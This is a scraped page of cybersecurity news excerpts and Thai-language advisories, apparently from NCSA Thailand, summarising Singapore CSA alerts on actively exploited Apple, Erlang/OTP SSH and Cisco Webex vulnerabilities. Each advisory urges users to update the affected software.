"We are, without question, in a global AI race. Every organization, supplier, and government is rushing to realize AI's benefits before their competitors do. The stakes are massive — not just in terms of business competition but in shaping the future balance of power across industries and nations. This validates AI's power and usefulness — it's considered existential to "get there first," as those who successfully leverage AI (especially artificial general intelligence and superintelligence) expect to become uncatchable."
https://www.darkreading.com/vulnerabilities-threats/global-ai-race-balancing-innovation-security - Countries Shore Up Their Digital Defenses As Global Tensions Raise The Threat Of Cyberwarfare
"Hackers linked to Russia’s government launched a cyberattack last spring against municipal water plants in rural Texas. At one plant in Muleshoe, population 5,000, water began to overflow. Officials had to unplug the system and run the plant manually. The hackers weren’t trying to taint the water supply. They didn’t ask for a ransom. Authorities determined the intrusion was designed to test the vulnerabilities of America’s public infrastructure. It was also a warning: In the 21st century, it takes more than oceans and an army to keep the United States safe."
https://www.securityweek.com/countries-shore-up-their-digital-defenses-as-global-tensions-raise-the-threat-of-cyberwarfare/ - Cyberfraud In The Mekong Reaches Inflection Point, UNODC Reveals
"Transnational organized crime groups in East and Southeast Asia are hedging beyond the region as crack-down pressure increases, a new report by the UN Office on Drugs and Crime (UNODC) shows. Amidst heightened awareness and enforcement action, Asian crime syndicates are expanding operations deeper into many of the most remote, vulnerable, underprepared parts of the region — and beyond."
https://www.unodc.org/roseap/en/2025/04/cyberfraud-mekong-inflection-point/story.html
https://therecord.media/southeast-asia-cyber-fraud-at-inflection-point
อ้างอิง
Electronic Transactions Development Agency(ETDA) - Hawk Eye: Open-Source Scanner Uncovers Secrets And PII Across Platforms
-
การใช้ประโยชน์จากช่องโหว่ในผลิตภัณฑ์ของ Apple
Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ Apple ได้ออกอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่หลายรายการในผลิตภัณฑ์ของตน โดยแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันที ช่องโหว่ที่ได้รับการแก้ไข (CVE-2025-31200 และ CVE-2025-31201) รายงานว่ากำลังถูกใช้ในการโจมตีจริงแล้ว
รายละเอียดของช่องโหว่มีดังนี้
CVE-2025-31200: เป็นช่องโหว่ประเภทหน่วยความจำเสียหาย (Memory Corruption) ซึ่งหากถูกโจมตีสำเร็จ อาจทำให้ผู้โจมตีสามารถรันโค้ดได้โดยการประมวลผลไฟล์มีเดียที่มีการสร้างสตรีมเสียงอันตรายไว้
CVE-2025-31201: หากถูกโจมตีสำเร็จ อาจเปิดช่องให้ผู้โจมตีที่มีสิทธิอ่านและเขียนข้อมูลโดยพลการสามารถหลีกเลี่ยงระบบตรวจสอบ Pointer Authentication ได้
ผลิตภัณฑ์ที่ได้รับผลกระทบมีดังนี้
- iPhone XS และรุ่นใหม่กว่า
- iPad Pro 13 นิ้ว
- iPad Pro 13.9 นิ้ว (รุ่นที่ 3 ขึ้นไป)
- iPad Pro 11 นิ้ว (รุ่นที่ 1 ขึ้นไป)
- iPad Air (รุ่นที่ 3 ขึ้นไป)
- iPad (รุ่นที่ 7 ขึ้นไป)
- iPad mini (รุ่นที่ 5 ขึ้นไป)
- Mac ที่ใช้ระบบปฏิบัติการ macOS Sequoia
- Apple TV HD และ Apple TV 4K ทุกรุ่น
- Apple Vision Pro
แนะนำให้ผู้ใช้งานและผู้ดูแลระบบดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันทีเพื่อป้องกันความเสี่ยงจากการถูกโจมตี
นอกจากนี้ ผู้ใช้งานยังควรเปิดใช้งานระบบอัปเดตอัตโนมัติโดยไปที่:
Settings > General > Software Updates > Enable Automatic Updatesอ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-038สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ช่องโหว่ร้ายแรงในเซิร์ฟเวอร์ SSH ของ Erlang/OTP
Cyber Security Agency of Singapore (CSA)ได้เผยแพร่กรณีนักวิจัยด้านความปลอดภัยได้เปิดเผยช่องโหว่ความรุนแรงระดับวิกฤตในเซิร์ฟเวอร์ SSH ของ Erlang/OTP โดยแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของเวอร์ชันที่ได้รับผลกระทบดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันที
ช่องโหว่ดังกล่าว (CVE-2025-32433) ส่งผลกระทบต่อเซิร์ฟเวอร์ SSH ของ Erlang/OTP ซึ่งเป็นชุดไลบรารีสำหรับภาษาโปรแกรม Erlang โดยช่องโหว่นี้ได้รับคะแนนระดับความรุนแรง CVSSv3.1 10 คะแนน และมีการเผยแพร่โค้ดตัวอย่างการโจมตี (Proof-of-Concept) สู่สาธารณะแล้ว หากช่องโหว่นี้ถูกโจมตีโดยผู้ไม่หวังดีสำเร็จ อาจทำให้สามารถข้ามกระบวนการยืนยันตัวตนและรันคำสั่งจากระยะไกล (Remote Code Execution) ได้
ช่องโหว่นี้ส่งผลกระทบต่อ Erlang/OTP เวอร์ชันดังต่อไปนี้ รวมถึงเวอร์ชันก่อนหน้า:
- OTP-27.3.2
- OTP-26.2.5.10
- OTP-25.3.2.19
แนะนำให้ผู้ใช้งานและผู้ดูแลระบบอัปเดตซอฟต์แวร์เป็นเวอร์ชันล่าสุดทันทีเพื่อป้องกันความเสี่ยงจากการถูกโจมตี
อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-036/สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ช่องโหว่ร้ายแรงในแอป Cisco Webex
Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ Cisco ได้มีการออกอัปเดตด้านความปลอดภัย เพื่อแก้ไขช่องโหว่ในแอปพลิเคชัน Cisco Webex โดยแนะนำให้ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ที่ได้รับผลกระทบ ดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดโดยทันที
ช่องโหว่ที่ได้รับการแก้ไขนี้ (CVE-2025-20236) ส่งผลกระทบต่อ Cisco Webex App เวอร์ชัน 44.6 และ 44.7 หากผู้ไม่ประสงค์ดีสามารถใช้ช่องโหว่นี้โจมตีได้สำเร็จ อาจล่อลวงเหยื่อให้คลิกที่ลิงก์เชิญเข้าร่วมประชุมที่ถูกสร้างขึ้นอย่างเป็นอันตราย เพื่อดาวน์โหลดไฟล์โดยพลการ และนำไปสู่การรันคำสั่งจากระยะไกล (Remote Code Execution) บนอุปกรณ์ของเหยื่อได้
จึงแนะนำให้ผู้ใช้งานและผู้ดูแลระบบอัปเดตซอฟต์แวร์ให้เป็นเวอร์ชันล่าสุดโดยทันที เพื่อป้องกันความเสี่ยงจากการถูกโจมตี
อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-037/สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand